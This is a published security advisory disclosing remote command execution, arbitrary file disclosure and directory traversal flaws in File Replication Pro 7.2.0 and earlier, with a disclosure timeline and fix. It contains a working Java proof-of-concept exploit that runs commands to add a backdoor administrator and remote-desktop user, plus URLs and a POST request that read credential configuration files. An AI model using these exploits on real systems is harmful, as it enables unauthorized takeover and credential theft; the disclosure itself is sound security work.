Vantage Point Security Advisory 2016-001 ================================ Title: File Replication Pro Remote Command Execution Vendor: File Replication Pro Vendor URL: http://www.filereplicationpro.com/ Versions affected: =< 7.2.0 Severity: High Vendor notified: Yes Reported: 29 October 2015 Public release: 10 February 2016 Author: Jerold Hoong and the VP team <jerold[at]vantagepoint[dot]sg> Permalink: Summary: -------- File Replication Pro (FRP) is a file management solution that is used to back up and copy files from various nodes in the network. Vantage Point has discovered multiple vulnerabilities in FRP v7.2.0 (and possibly prior versions) that allow a remote unauthenticated malicious user to run arbitrary code with SYSTEM privileges. The vulnerabilities that were discovered are: - Unauthenticated Remote Command Execution - Unauthenticated Remote Arbitrary File Disclosure - Unauthenticated Directory Traversal and File Listing 1. Unauthenticated Remote Command Execution ------------------------------------------- The backup agent implements an RPC service on port 9200 that supports various calls, including a function called "ExecCommand" that unsurprisingly executes shell commands on the system. A password hash is used to authenticate calls on this interface (note that the hash itself, not the password, is used for authentication, so disclosure of the hash is equivalent to disclosure of the credential). This hash can be obtained from the remote file disclosure vulnerability present in the software (listed below) and used to authenticate to the RPC service, after which arbitrary commands are executed as the SYSTEM user. 
POC Exploit Code of Malicious RPC Client: /** * @author Jerold Hoong (Vantage Point Security) * File Replication Pro =< v7.2.0 * Remote Command Execution PoC Working Exploit * www.vantagepoint.sg * NOTE: Include FRP libraries to compile */ import java.io.IOException; import java.util.HashMap; import java.util.Map; import net.diasoft.frp.engine.exception.RPCException; import net.diasoft.frp.engine.model.AddressPort; import net.diasoft.frp.engine.tcp.client.RPCDriver; import net.diasoft.frp.engine.tcp.client.TCPConnection; public class Main { static String ip = "1.2.3.4"; static int port = 9200; // password string can be retrieved from remote file disclosure vulnerability (configuration.xml) // If no password is set, input blank string for password // Use IE to navigate to <Target IP>:9200. OK = NO-AUTH, Error = AUTH static String password = ""; // password 12345 jLIjfQZ5yojbZGTqxg2pY0VROWQ= public static void main(String[] args) { AddressPort ap = new AddressPort(ip, port); AddressPort addresses[] = {ap}; TCPConnection _tcp_connection = null; try { _tcp_connection = new TCPConnection(addresses, password, true); } catch (Exception e) { e.printStackTrace(); } System.out.print("Connecting to host..."); RPCDriver rpc = new RPCDriver(_tcp_connection); HashMap p = new HashMap(); try { Map r = rpc.callFunction("ExecCommand", p); System.out.print("Success!\n"); } catch (RPCException e) { e.printStackTrace(); } catch (IOException e) { e.printStackTrace(); } catch (ClassNotFoundException e) { e.printStackTrace(); } // add new user System.out.print("Attempting to add user 'vantagepoint' with password 'LOLrofl1337!': "); p.put("COMMAND", "net user vantagepoint LOLrofl1337! 
/add"); try { Map r = rpc.callFunction("ExecCommand", p); } catch (RPCException e) { e.printStackTrace(); } catch (IOException e) { e.printStackTrace(); } catch (ClassNotFoundException e) { e.printStackTrace(); } // add new user to Admin group System.out.print("Attempting to add user 'vantagepoint' to 'Administrators' group: "); p.put("COMMAND", "net localgroup \"Administrators\" vantagepoint /add"); try { Map r = rpc.callFunction("ExecCommand", p); } catch (RPCException e) { e.printStackTrace(); } catch (IOException e) { e.printStackTrace(); } catch (ClassNotFoundException e) { e.printStackTrace(); } //add new user to RDP group System.out.print("Attempting to add user 'vantagepoint' to 'Remote Desktop Users' group:"); p.put("COMMAND", "net localgroup \"Remote Desktop Users\" vantagepoint /add"); try { Map r = rpc.callFunction("ExecCommand", p); } catch (RPCException e) { e.printStackTrace(); } catch (IOException e) { e.printStackTrace(); } catch (ClassNotFoundException e) { e.printStackTrace(); } System.out.print("\n\n---- END ----\n\n"); } } 2. Unauthenticated Remote Arbitrary File Disclosure --------------------------------------------------- A flaw in File Replication Pro allows a malicious user to gain access to the contents of any file on the remote server. This leads to the compromise of sensitive information such as user accounts and password hashes, which can then be used to further exploit the server using other vulnerabilities in the software. An example of how to view File Replication Pro's web interface user accounts and credentials is shown below by accessing the following URLs: - http://1.2.3.4:9100/DetailedLogReader.jsp?log_path=C:\Program+Files\FileReplicationPro\\etc\\properties.xml - http://1.2.3.4:9100/DetailedLogReader.jsp?log_path=C:\Program+Files\FileReplicationPro\\etc\\configuration.xml 3. 
Unauthenticated Directory Traversal and File Listing ------------------------------------------------------- It was possible to anonymously view the file directory structure of the remote File Replication Pro management server as well as the file directory structure of all server nodes that are managed by the management server. The parameters that are used to construct the POST request in the example code below can be obtained via the remote file disclosure vulnerability by accessing File Replication Pro's configuration.xml, properties.xml and .frp_id files. POST /GetRemoteDirList.jsp?server_name=WIN7SP1&server_key=WIN7SP1~29d919a3:150c736b708:-8000&server_role=Source&server_password=&parent_dir=../../../c:/ HTTP/1.1 Host: 127.0.0.1:9100 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1:9100/AddEditJob.do?action=new Cookie: show_greeting=value; JSESSIONID=81cgjqf795cai Connection: keep-alive Pragma: no-cache Cache-Control: no-cache Content-Length: 0 Fix Information: ---------------- Upgrade to the latest version of File Replication Pro 7.3.0 Timeline: --------- 28 October 2015 - Vulnerabilities discovered 06 November 2015 - Vendor acknowledged and scheduled fixes to commence 02 February 2016 - Patch released by vendor 10 February 2016 - Release of this advisory to the public About Vantage Point Security: ----------------------------- Vantage Point is the leading provider for penetration testing and security advisory services in Singapore. Clients in the Financial, Banking and Telecommunications industries select Vantage Point Security based on technical competency and a proven track record to deliver significant and measurable improvements in their security posture. 
office[at]vantagepoint[dot]sg